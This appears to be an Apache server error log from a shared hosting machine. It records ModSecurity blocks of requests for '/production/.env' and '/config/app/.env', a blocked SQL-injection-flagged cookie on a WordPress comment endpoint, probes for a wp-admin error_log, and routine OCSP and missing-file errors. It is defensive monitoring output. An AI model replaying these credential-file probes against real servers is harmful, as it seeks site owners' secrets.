[Mon May 11 18:07:49.759286 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1Q-Qm4vhlWBPlMjekAAAAAE"]
[Mon May 11 18:07:49.994928 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/production/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjekQAAAAE"]
[Mon May 11 18:07:49.995243 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/production/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjekQAAAAE"]
[Mon May 11 18:07:49.995556 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1Q-Qm4vhlWBPlMjekQAAAAE"]
[Mon May 11 18:07:50.242580 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/app/.env"] [unique_id "agH-1g-Qm4vhlWBPlMjekgAAAAE"]
[Mon May 11 18:07:50.242845 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/app/.env"] [unique_id "agH-1g-Qm4vhlWBPlMjekgAAAAE"]
[Mon May 11 18:07:50.243250 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1g-Qm4vhlWBPlMjekgAAAAE"]
[Mon May 11 18:07:50.548787 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:50.863268 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:51.094028 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:51.419714 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:51.692436 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:51.756125 2026] [ssl:error] [pid 1411201:tid 1411256] (EAI 2)Name or service not known: [client 192.178.6.9:54079] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:07:51.756361 2026] [ssl:error] [pid 1411201:tid 1411256] AH01941: stapling_renew_response: responder error
[Mon May 11 18:07:51.935328 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:52.168765 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:52.187707 2026] [ssl:error] [pid 1411201:tid 1411260] (EAI 2)Name or service not known: [client 192.178.6.8:64948] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:07:52.187742 2026] [ssl:error] [pid 1411201:tid 1411260] AH01941: stapling_renew_response: responder error
[Mon May 11 18:07:52.412407 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:52.695716 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:53.039374 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:53.320399 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:53.704799 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:53.839020 2026] [security2:error] [pid 1411201:tid 1411254] [client 45.130.81.119:41655] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: dc73b6e86fc2e0ad783e3d746449aa82||1778517437||1778517077"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agH-2fy_GXSWIKeli0sYmAAAAIg"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 18:07:53.839412 2026] [security2:error] [pid 1411201:tid 1411254] [client 45.130.81.119:41655] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agH-2fy_GXSWIKeli0sYmAAAAIg"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 18:07:53.841058 2026] [security2:error] [pid 1411201:tid 1411254] [client 45.130.81.119:41655] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agH-2fy_GXSWIKeli0sYmAAAAIg"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 18:07:53.994113 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:54.238684 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:54.474614 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:54.805506 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:55.114950 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:55.386316 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:55.650295 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:55.906860 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:56.162692 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:56.448919 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:56.707799 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:56.986911 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:57.254320 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:57.533241 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:57.784895 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:58.026551 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:58.340488 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:59.334027 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:59.602826 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:07:59.880995 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:00.165882 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:00.411683 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:00.747657 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:00.987824 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:01.241799 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:01.480346 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:01.745072 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:01.978105 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:02.217463 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:02.515360 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:02.765492 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:03.043274 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:03.272739 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:03.523501 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:03.770469 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:04.014888 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:08:04.291810 2026] [:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:09:08.849736 2026] [security2:error] [pid 1416109:tid 1416147] [client 129.226.94.18:42492] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH_JFV4kyjgo4bQBUh5pQAAANE"]
[Mon May 11 18:09:31.392811 2026] [autoindex:error] [pid 1411099:tid 1411122] [client 185.12.59.118:50334] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:09:32.637987 2026] [proxy_fcgi:error] [pid 1411201:tid 1411249] [client 4.193.137.131:12144] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:09:32.813897 2026] [proxy_fcgi:error] [pid 1411201:tid 1411249] [client 4.193.137.131:12144] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:09:34.292839 2026] [proxy_fcgi:error] [pid 1411201:tid 1411249] [client 4.193.137.131:12144] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:10:02.847945 2026] [ssl:error] [pid 1424905:tid 1424910] (EAI 2)Name or service not known: [client 109.131.150.252:59129] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:02.848149 2026] [ssl:error] [pid 1424905:tid 1424910] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:50.737360 2026] [ssl:error] [pid 1412074:tid 1412083] (EAI 2)Name or service not known: [client 216.157.42.89:47889] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:50.737600 2026] [ssl:error] [pid 1412074:tid 1412083] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:51.259189 2026] [ssl:error] [pid 1411055:tid 1411061] (EAI 2)Name or service not known: [client 216.157.42.75:39569] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:51.259231 2026] [ssl:error] [pid 1411055:tid 1411061] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:52.308569 2026] [ssl:error] [pid 1411201:tid 1411253] (EAI 2)Name or service not known: [client 216.157.42.70:36112] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:52.308615 2026] [ssl:error] [pid 1411201:tid 1411253] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:53.338993 2026] [ssl:error] [pid 1411055:tid 1411074] (EAI 2)Name or service not known: [client 216.157.42.83:43793] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:53.339028 2026] [ssl:error] [pid 1411055:tid 1411074] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:53.853265 2026] [ssl:error] [pid 1416109:tid 1416145] (EAI 2)Name or service not known: [client 216.157.42.95:55646] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:53.853308 2026] [ssl:error] [pid 1416109:tid 1416145] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:54.394027 2026] [ssl:error] [pid 1411055:tid 1411079] (EAI 2)Name or service not known: [client 216.157.42.79:20602] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:54.394081 2026] [ssl:error] [pid 1411055:tid 1411079] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:55.444395 2026] [ssl:error] [pid 1411055:tid 1411059] (EAI 2)Name or service not known: [client 216.157.42.67:11880] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:55.444434 2026] [ssl:error] [pid 1411055:tid 1411059] AH01941: stapling_renew_response: responder error
[Mon May 11 18:10:56.483704 2026] [ssl:error] [pid 1411201:tid 1411263] (EAI 2)Name or service not known: [client 216.157.42.83:7889] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:10:56.483753 2026] [ssl:error] [pid 1411201:tid 1411263] AH01941: stapling_renew_response: responder error
[Mon May 11 18:11:56.272968 2026] [security2:error] [pid 1411201:tid 1411424] [client 123.207.65.62:60252] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agH_zPy_GXSWIKeli0sZjwAAAJM"]
[Mon May 11 18:12:03.808597 2026] [security2:error] [pid 1411099:tid 1411119] [client 123.207.65.62:38746] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agH_0w-Qm4vhlWBPlMjfwQAAABM"], referer: http://labaujue.com
[Mon May 11 18:12:26.548027 2026] [security2:error] [pid 1411099:tid 1411107] [client 176.9.111.189:45380] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/robots.txt"] [unique_id "agH_6g-Qm4vhlWBPlMjf4wAAAAY"]
[Mon May 11 18:12:31.901457 2026] [security2:error] [pid 1411201:tid 1411248] [client 45.89.241.203:62645] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH_7_y_GXSWIKeli0sZsAAAAII"], referer: https://www.piregwan-genesis.com/
[Mon May 11 18:13:20.009756 2026] [ssl:error] [pid 1411099:tid 1411117] (EAI 2)Name or service not known: [client 18.159.231.78:10464] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.010067 2026] [ssl:error] [pid 1411099:tid 1411117] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.062028 2026] [ssl:error] [pid 1411201:tid 1411267] (EAI 2)Name or service not known: [client 18.192.252.214:17918] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.062068 2026] [ssl:error] [pid 1411201:tid 1411267] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.175259 2026] [ssl:error] [pid 1412074:tid 1412098] (EAI 2)Name or service not known: [client 18.159.199.77:18772] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.175323 2026] [ssl:error] [pid 1412074:tid 1412098] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.280750 2026] [ssl:error] [pid 1411099:tid 1411118] (EAI 2)Name or service not known: [client 18.159.199.77:29079] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.280791 2026] [ssl:error] [pid 1411099:tid 1411118] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.328073 2026] [ssl:error] [pid 1411201:tid 1411264] (EAI 2)Name or service not known: [client 3.126.182.232:1636] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.328106 2026] [ssl:error] [pid 1411201:tid 1411264] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.374235 2026] [ssl:error] [pid 1424905:tid 1424928] (EAI 2)Name or service not known: [client 18.157.238.182:43411] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.374300 2026] [ssl:error] [pid 1424905:tid 1424928] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.449683 2026] [ssl:error] [pid 1411055:tid 1411075] (EAI 2)Name or service not known: [client 18.159.93.15:48793] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.449717 2026] [ssl:error] [pid 1411055:tid 1411075] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:20.527551 2026] [ssl:error] [pid 1411201:tid 1411253] (EAI 2)Name or service not known: [client 3.127.31.193:14084] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:13:20.527575 2026] [ssl:error] [pid 1411201:tid 1411253] AH01941: stapling_renew_response: responder error
[Mon May 11 18:13:24.204693 2026] [authz_core:error] [pid 1411201:tid 1411259] [client 194.163.174.253:59626] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 18:13:34.075149 2026] [authz_core:error] [pid 1416109:tid 1416140] [client 194.163.174.253:62455] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 18:14:14.337525 2026] [ssl:error] [pid 1412074:tid 1412093] (EAI 2)Name or service not known: [client 44.250.182.241:61343] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:14:14.409436 2026] [ssl:error] [pid 1412074:tid 1412093] AH01941: stapling_renew_response: responder error
[Mon May 11 18:14:15.825890 2026] [ssl:error] [pid 1411099:tid 1411119] (EAI 2)Name or service not known: [client 44.250.182.241:40533] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:14:15.825918 2026] [ssl:error] [pid 1411099:tid 1411119] AH01941: stapling_renew_response: responder error
[Mon May 11 18:14:18.938359 2026] [security2:error] [pid 1411201:tid 1411266] [client 2.57.23.109:63795] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIAWvy_GXSWIKeli0saKgAAAJU"], referer: https://www.piregwan-genesis.com/
[Mon May 11 18:14:45.356696 2026] [security2:error] [pid 1412074:tid 1412094] [client 43.140.247.223:49154] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "culturesvoile.com"] [uri "/"] [unique_id "agIAdTJnyuKVXoStDhbc3wAAAFI"], referer: http://culturesvoile.com
